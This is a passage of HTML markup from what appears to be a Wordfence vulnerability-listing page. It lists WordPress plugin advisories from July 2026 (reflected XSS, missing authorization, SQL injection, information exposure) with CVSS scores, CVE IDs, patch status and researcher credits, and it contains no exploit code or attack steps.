			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fluentform" target="_blank" rel="noopener">Fluent Forms – Customizable Contact Forms, Survey, Quiz, &amp; Conversational Form Builder</a> <span class="wfvr-software-slug">[fluentform]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/osvaldo-noe-gonzalez-del-rio" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/ed1755942aa6cb7ca0583880be85d3b3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ed1755942aa6cb7ca0583880be85d3b3"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/osvaldo-noe-gonzalez-del-rio" target="_blank" rel="noopener">Osvaldo Noe Gonzalez Del Rio (Os)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/547008fe-2585-4089-a710-71a83ae3d829" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/afb58149-cff0-4911-8322-c608fc00adf4" target="_blank" rel="noopener">GEO Plugin by Squirrly SEO &lt;= 14.2.0 &#8211; Reflected Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.1 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66664" target="_blank" rel="noopener noreferrer">							CVE-2026-66664						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/squirrly-seo" target="_blank" rel="noopener">GEO Plugin by Squirrly SEO</a> <span class="wfvr-software-slug">[squirrly-seo]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/afb58149-cff0-4911-8322-c608fc00adf4" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/97c21d5a-9140-4e97-b166-531d243b084d" target="_blank" rel="noopener">Link Library &lt; 7.9.4 &#8211; Reflected Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.1 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18197" target="_blank" rel="noopener noreferrer">							CVE-2026-18197						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 29, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/link-library" target="_blank" rel="noopener">Link Library</a> <span class="wfvr-software-slug">[link-library]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/joshua-martinelle" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/joshua-martinelle" target="_blank" rel="noopener">Joshua Martinelle</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/97c21d5a-9140-4e97-b166-531d243b084d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c7370cbc-f681-49d7-9330-762443202529" target="_blank" rel="noopener">Responsive Thumbnail Slider &lt; 1.1.53 &#8211; Reflected Cross-Site Scripting via &#8216;id&#8217; Parameter</a></h4>
<div class="cvss-score-badge">6.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.1 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18344" target="_blank" rel="noopener noreferrer">							CVE-2026-18344						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-responsive-thumbnail-slider" target="_blank" rel="noopener">Responsive Thumbnail Slider</a> <span class="wfvr-software-slug">[wp-responsive-thumbnail-slider]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c7370cbc-f681-49d7-9330-762443202529" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0d9ba01b-09ae-4d35-8bec-30e7673c2a20" target="_blank" rel="noopener">Ad Invalid Click Protector (AICP) &lt;= 1.3.0 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65445" target="_blank" rel="noopener noreferrer">							CVE-2026-65445						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ad-invalid-click-protector" target="_blank" rel="noopener">Ad Invalid Click Protector (AICP)</a> <span class="wfvr-software-slug">[ad-invalid-click-protector]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0d9ba01b-09ae-4d35-8bec-30e7673c2a20" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8feabfb4-d094-467e-a1b7-266631a04c2f" target="_blank" rel="noopener">Bit Form – Contact Form, Payment Forms, Multi Step Forms, Calculator &amp; Custom Form Builder &lt; 3.1.2 &#8211; Missing Authorization to Unauthenticated Unauthorized Form Submission</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15054" target="_blank" rel="noopener noreferrer">							CVE-2026-15054						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 30, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bit-form" target="_blank" rel="noopener">Bit Form – Contact Form, Payment Forms, Multi Step Forms, Calculator &amp; Custom Form Builder</a> <span class="wfvr-software-slug">[bit-form]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/charles-vosburgh" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7ca13d60571fa21c6a24a25447a74480.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7ca13d60571fa21c6a24a25447a74480"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/charles-vosburgh" target="_blank" rel="noopener">Charles Vosburgh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8feabfb4-d094-467e-a1b7-266631a04c2f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/815a8764-9004-4cd7-9558-6ce0f804c936" target="_blank" rel="noopener">BOX NOW Delivery Croatia &lt;= 3.3.0 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65504" target="_blank" rel="noopener noreferrer">							CVE-2026-65504						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/box-now-delivery-croatia" target="_blank" rel="noopener">BOX NOW Delivery Croatia + Slovenia</a> <span class="wfvr-software-slug">[box-now-delivery-croatia]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nabil-irawan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/86a1429aeb8e473ec62cf8dd3d4e4571.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="86a1429aeb8e473ec62cf8dd3d4e4571"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nabil-irawan" target="_blank" rel="noopener">Nabil Irawan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/815a8764-9004-4cd7-9558-6ce0f804c936" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c9e09c6a-7d71-4c82-bc7a-ac310f52b5cd" target="_blank" rel="noopener">Breakdance &lt;= 2.6.1 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65551" target="_blank" rel="noopener noreferrer">							CVE-2026-65551						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/breakdance" target="_blank" rel="noopener">Breakdance</a> <span class="wfvr-software-slug">[breakdance]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/johska" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/343456e443c863409724aa97bcfa6e3e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="343456e443c863409724aa97bcfa6e3e"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/johska" target="_blank" rel="noopener">johska</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c9e09c6a-7d71-4c82-bc7a-ac310f52b5cd" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/874c1ba5-1bbd-43ac-bc5c-901638fa56ef" target="_blank" rel="noopener">Database Collation Fix &lt;= 1.2.10 &#8211; Unauthenticated SQL Injection via &#8216;force-collation-algorithm&#8217; Parameter</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15018" target="_blank" rel="noopener noreferrer">							CVE-2026-15018						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/database-collation-fix" target="_blank" rel="noopener">Database Collation Fix</a> <span class="wfvr-software-slug">[database-collation-fix]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nabil-irawan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/86a1429aeb8e473ec62cf8dd3d4e4571.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="86a1429aeb8e473ec62cf8dd3d4e4571"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nabil-irawan" target="_blank" rel="noopener">Nabil Irawan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/874c1ba5-1bbd-43ac-bc5c-901638fa56ef" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/61ee1857-aa85-4d37-a347-a1f59c95cbff" target="_blank" rel="noopener">Demi &lt;= 0.0.8 &#8211; Unauthenticated Information Exposure to Arbitrary Directory Copy</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15012" target="_blank" rel="noopener noreferrer">							CVE-2026-15012						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/demi-backup-migration" target="_blank" rel="noopener">Demi – One Click Demo Import, Backup &amp; Site Migration</a> <span class="wfvr-software-slug">[demi-backup-migration]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sahraoui-aymen" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/3f87b1e29a7dffa171d90f689dfa86c7.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3f87b1e29a7dffa171d90f689dfa86c7"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sahraoui-aymen" target="_blank" rel="noopener">SAHRAOUI AYMEN</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/61ee1857-aa85-4d37-a347-a1f59c95cbff" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6054e4fe-b10e-4c63-877d-05d6662a9251" target="_blank" rel="noopener">Element Pack Addons for Elementor – Elementor Widgets, Elementor Templates, Elementor Addons &lt;= 8.7.13 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65502" target="_blank" rel="noopener noreferrer">							CVE-2026-65502						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bdthemes-element-pack-lite" target="_blank" rel="noopener">Element Pack Addons for Elementor – Elementor Widgets, Elementor Templates, Elementor Addons</a> <span class="wfvr-software-slug">[bdthemes-element-pack-lite]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/johska" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/343456e443c863409724aa97bcfa6e3e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="343456e443c863409724aa97bcfa6e3e"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/johska" target="_blank" rel="noopener">johska</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6054e4fe-b10e-4c63-877d-05d6662a9251" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0f38e5f0-6c62-4c0a-99f9-09bc20ee87d4" target="_blank" rel="noopener">Essential Addons for Elementor – Popular Elementor Templates &amp; Widgets &lt; 6.6.10 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-13345" target="_blank" rel="noopener noreferrer">							CVE-2026-13345						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 30, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/essential-addons-for-elementor-lite" target="_blank" rel="noopener">Essential Addons for Elementor – Popular Elementor Templates &amp; Widgets</a> <span class="wfvr-software-slug">[essential-addons-for-elementor-lite]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/revanth-hari-narayana-matte" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/8110ca50d15470d1569441aa4f6c445e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8110ca50d15470d1569441aa4f6c445e"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/revanth-hari-narayana-matte" target="_blank" rel="noopener">Revanth Hari Narayana Matte</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0f38e5f0-6c62-4c0a-99f9-09bc20ee87d4" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/20d744a0-ae5f-4a16-8736-bb3a2cb6d881" target="_blank" rel="noopener">Event Tickets and Registration &lt; 5.29.0.1 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14822" target="_blank" rel="noopener noreferrer">							CVE-2026-14822						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 1, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/event-tickets" target="_blank" rel="noopener">Event Tickets and Registration</a> <span class="wfvr-software-slug">[event-tickets]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/minar" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/e6fb44cd94cc5b5f1bb5c21077caa672.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e6fb44cd94cc5b5f1bb5c21077caa672"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/minar" target="_blank" rel="noopener">Minar</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/20d744a0-ae5f-4a16-8736-bb3a2cb6d881" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1754293e-ed27-4b5e-92f3-aea23127e0bc" target="_blank" rel="noopener">Exclusive Addons Elementor &lt;= 2.8.0 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66438" target="_blank" rel="noopener noreferrer">							CVE-2026-66438						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/exclusive-addons-for-elementor" target="_blank" rel="noopener">Exclusive Addons for Elementor</a> <span class="wfvr-software-slug">[exclusive-addons-for-elementor]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1754293e-ed27-4b5e-92f3-aea23127e0bc" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/565980d7-8dc9-42a4-90c5-2f75af52fb8e" target="_blank" rel="noopener">Fluent Forms &lt;= 6.2.8 &#8211; Unauthenticated Sensitive Information Exposure via Insecure Direct Object Reference and Weak Transaction Hash in &#8216;transaction&#8217; Parameter</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-17567" target="_blank" rel="noopener noreferrer">							CVE-2026-17567						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 30, 2026</strong>
			</div>
</p></div>
